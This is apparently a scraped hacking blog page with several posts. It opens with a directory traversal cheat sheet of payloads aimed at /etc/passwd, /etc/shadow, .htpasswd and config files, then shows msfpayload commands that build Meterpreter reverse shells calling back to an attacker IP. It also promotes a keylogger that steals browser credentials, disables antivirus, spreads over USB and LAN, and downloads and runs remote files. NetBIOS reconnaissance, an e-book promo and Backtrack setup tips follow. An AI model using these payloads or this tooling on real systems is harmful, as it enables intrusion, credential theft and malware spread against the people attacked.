Directory Traversal Cheat Sheet


Cheat Sheet for Directory Traversal Attack







    ____ _                            _   _   _            _                 
   / ___| |__   ___ _ __  _ __   __ _(_) | | | | __ _  ___| | _____ _ __ ___ 
  | |   | '_ \ / _ \ '_ \| '_ \ / _` | | | |_| |/ _` |/ __| |/ / _ \ '__/ __|
  | |___| | | |  __/ | | | | | | (_| | | |  _  | (_| | (__|   <  __/ |  \__ \
   \____|_| |_|\___|_| |_|_| |_|\__,_|_| |_| |_|\__,_|\___|_|\_\___|_|  |___/




/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
/etc/passwd
../etc/passwd
../etc/passwd
../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

0 comments:

Backtrack kernel sources


Prepare Backtrack kernel sources



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting



Some drivers and programs in Backtrack require kernel headers, like wireless drivers, Vmware tools for example.
CHC embers this is the easy way of compiling the Backtrack kernel:


root@bt:~# prepare-kernel sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/


0 comments:

NetBIOS Scanning


Scanning NetBIOS using nbtscan and Metasploit

Hello CHC members ,During a penetration testing engagement we might come across with the NetBIOS service.In the past the NetBIOS protocol was enabled in almost every network that was running Windows.In nowadays system administrators are disabling this service due to the fact that plenty of information can be unveiled regarding shares,users and domain controllers.However NetBIOS can still be found on default configurations of Windows Server 2008 and Windows Vista so in a penetration testing this protocol can be abused if we discover it.
Generally the NetBIOS provides the following three services:
  • Name Service: UDP/137
  • Datagram Service: UDP/138
  • Session Service: TCP/139
In systems that have this service enabled we can use some tools in order to discover information about the hostnames and domains especially in windows networks.In some cases this protocol can be found and in Linux systems.
The two basic tools are nbtstat and nbtscan.The nbtstat is a command line utility that is integrated in windows systems and it can unveil information about the netbios names and the remote machine name table or local but only for one host.From the other hand the nbtscan is a netbios nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one.
The next image is showing the usage of the nbtstat:
   nbtstat usage
The numeric values are called suffixes.For example the <01> and <1D> suffixes indicates the Master Browser,the <20> that the machine is running File Server service,the <03> that a messenger service is running and the <00> means that a workstation service is running as well.The <1E> is the Browser Service Elections.
The nbtscan is by default installed on backtrack but there is a version as well for windows platforms.We can use the nbtscan in order to scan the whole network.As we can see from the next image we have discovered the IP addresses,the NetBIOS names,the users that are logged in and the MAC addresses from the hosts that are running the NetBIOS service on the network.
   nbtscan

We can use also the -v option in order to produce a verbose output.
  nbtscan – verbose output

With the verbose option the output format is similar to the nbtstat.Again the <01> indicates the Master Browser service,the <00> the workstation,the <20> the File Server service and the <1e> and <1d> the Browser Service Elections and the Master Browser.Also we can see that the domain that this workstation belongs is London.
As an alternative option we can use the metasploit module smb_version which will unveil additional information like the operating system name and version,the service pack level,the language,the system and domain name.
Metasploit smb_version module

Conclusion
As we saw in this article from systems that had enabled the netbios service we have managed to discover plenty of information including the domain names,users,operating systems versions,MAC addresses and other.This service if found enabled can be used in the information gathering stage of a penetration test.So from the security point of view it is recommended this service to be disabled.

0 comments:

Unknow Keylogger v1.4 (Tool+Source Code)


  
Unknow Keylogger v1.4









Features:

1- Built in Stub 2- Get Tons of Information about the Victim (Computer User, Computer Name, Computer Total Physical Memory, Victim's IP Address, Victim's Country, Date, etc...) 3- Send logs to SMTP Severs and FTP 4- SMTP (Hotmail, Gmail, AOL, Yahoo) 5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo) 6- Test FTP Functionality 7- Continuously Send Logs without Fail 8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you) 9- Logs Every Single Thing on the Keyboard (Letters(Up Cases and Low Cases) - Numbers - Symbols - Specific Keys ([F1], [F2], [Home], etc...)) 10- Works on all Operating Systems (Window XP, Window Vista, Window 7 (32 and 64 bit) 11- Hide Functionality (Make the Server Invisible to the Naked eye) 12- Never Crashes in Victim's Computer (Will always be working whatever happens) 13- Simple and Easy to use GUI 14- Customer Server Name 15- Sends Clean and Very Organized Logs 16- Can be Used as a Keylogger - Stealer - Worm - Spreader and more by just Checking Few Boxes


Spreaders:
1- USB Spreader 2- LAN Spreader 3- P2P Spreader 4- RAR Spreader


Stealers:
1- Firefox 4/5/6/7/8/9 2- Google Chrome All Versions 3- Opera All Versions 4- Internet Explorer 7/9 5- Steam Stealer 6- CD Keys (up to 300)


Anti Killers:
1- Anti Nod32 (All Versions) 2- Anti Kaspersky (All Versions) 3- Anti BitDefender (All Versions) 4- Anti MalwareBytes (All Versions) 5- Anti Norman (All Versions) 6- Anti WireShark (All Versions) 7- Anti Anubis (All Versions) 8- Anti KeyScrambler (All Versions) 9- Anti Ollydbg (All Versions) 10- Anti Outpost (All Versions) 11- Anti ZoneAlaram (All Versions)


Disablers:
1- Disable RUN 2- Disable Registry 3- Disable CMD 4- Disable Right Click 5- Disable Task Manager 6- Disable System Restore


Deleters:
1- Delete FireFox Cookies 2- Delete Google Chrome Cookies 3- Delete Internet Explorer Cookies


Download And Execute Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously 

Wpge Loader: Add any Link and it will be Automatically Loaded on the Victim's PC


Fake Message: Write any kind of Message and you can choose Any kinds of Types for it and it will Automatically Appear on the Victim's Computer


Built Ins 1- Icon Changer 2- File Pumper (the Server size will never change even if the Server was Zipped or Extracted)







2 comments:

Metasploit Framework Payload Commands

Msf Payload Commands

Here is a list with the available payload commands.


msfpayload -l
List available payloads.

msfpayload windows/meterpreter/bind_tcp O
List all available options for the windows/meterpreter/bind_tcp payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload to connect back to our IP on port 443.Then saves it as Windows executable file with the name payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R > payload.raw
Create a Meterpreter reverse_tcp payload to connect back to our IP and saves it as raw format.It can be combined with msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Export as C-formatted shellcode

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.


0 comments:

The Hacker's underground Handbook

Underground hackers E-Book


To Become a Hacker
Most of them are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in a samilar situation, then this article will most likely guide you to reach your goal.

Anyhow, I have found an excellent Book for the Beginners that will teach you hacking from the basics. This book is the first step to fulfil your dream of becoming a hacker. When I first read this book, I myself was surprised at how simple and easy it was laid out. I decided to introduce this book for all those enthusiasts as it can be the right source for the beginners who are interested to learn hacking from the basics. The good thing about this book is that, any one can understand the concepts presented here, without the need for any prior knowledge. This book is called
Become a Hacker
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything in this book is presented in a simple and effective manner. It is a great source for the beginner who would like to become a hacker. This will install a Hacker’s Mindseton you.
The following skills are uncovered in this book
1. You will learn all the hacker underground tricks and learn to apply them in real world situations.
2. You will be put into a hacker mindset so that you will learn to think like a Hacker.
3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
4. You will acquire knowledge nonexistent to 99.9% of the people in the world!
5. This underground handbook may get you interested in pursuing a career as an Ethical Hacker.
This book is of great value for all those who have a dream to become a Hacker.
So what are you waiting for? Go grab your copy now from the following link
                                    
 Download here

2 comments:

Adding an unprivileged user in backtrack

Add an user in Backtrack



Now that you have installed you Backtrack distribution, and changed your default password from "toor" to that of your choice, another security measure is also waiting for us.
The "root" account in Backtrack as is the case with Linux distribution is the most privileged account. It gives you the privilege of doing anything you like without asking for any confirmation, simply because the system supposes that you are completely aware of every single step you make.
 As a non-professional user of a Linux system, you may break things in the system and ending up reinstalling the system again and again, and this is what makes so many Linux users resign and resolve to their easy to use windows systems, why simply getting all this trouble they may say !!!!
They simply don't know that one has to be a professional Linux user in order to run the system as a "root" user, so if you don't want to damage your system or loose important data, you have to create a non privileged user in Backtrack,as such even you mishandle things in that account, these changes will not affect the "root" account in any way even if your machine got pwned by a hacker !!


Instructions:
* root@bt:~# adduser kiko
change "kiko to the name of your choice
type the specific password for the user you created, & retype it again.
You can fill in all the rest of the fields, or just skipping them by pressing "enter", then type "y" to confirm.

* root@bt:~# visudo
Now that you have added your new user account, you would not like to switch to "root' to do every small task !! So we will allow the usage of "sudo" command for the new created user. We need to add the user to "sudoers" list, and this is simply what "visudo" command does.
Once you type it, a "nano" config file will be displayed for you:



backtrack, linux, hacking, tutorial, pentest, penetration testing, pc, wpa, wpa2, cracking, password attack, metasploit, meterpreter, windows



Go to the end of the screen and look for the following line: %admin ALL=(ALL) ALL


backtrack, linux, hacking, tutorial, pentest, penetration testing, pc, wpa, wpa2, cracking, password attack, metasploit, meterpreter, windows


After this add a line same as the above but replace "admin" with the username you created. The example in the video is:   %kiko ALL=(ALL) ALL

Now you will be able able to use the "sudo" command without having to switch bach back to the "root" account to do a specific task. If you you want to install vlc for example, you will have to type

root@bt:~# sudo apt-get install vlc


Important !!! After you finish editing the file, hit "ctrl+O"
 to save the file, then hit "ctrl+X" to exit.

0 comments: